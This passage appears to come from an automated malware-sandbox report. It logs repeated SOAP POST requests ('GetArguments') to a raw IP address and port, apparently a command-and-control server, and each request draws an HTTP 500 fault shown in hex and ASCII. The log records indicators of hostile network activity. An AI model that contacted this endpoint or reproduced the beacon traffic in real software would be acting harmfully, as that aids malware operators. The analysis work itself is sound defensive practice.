65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:46.685693026 CEST10685OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:46.754786015 CEST10685INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:46.832741976 CEST10686INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:46 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:47.842459917 CEST10687OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:47.930561066 CEST10687INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:48.010165930 CEST10688INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:47 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:49.014729977 CEST10688OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:49.085124016 CEST10688INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:49.156687975 CEST10689INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:48 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:50.170488119 CEST10690OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:50.239442110 CEST10690INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:50.313112974 CEST10691INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:49 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:51.327889919 CEST10691OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:51.397778034 CEST10691INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:51.531280994 CEST10692INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:51 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:52.817751884 CEST10693OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:52.886411905 CEST10693INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:52.957573891 CEST10694INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:52 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:53.967710972 CEST10694OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
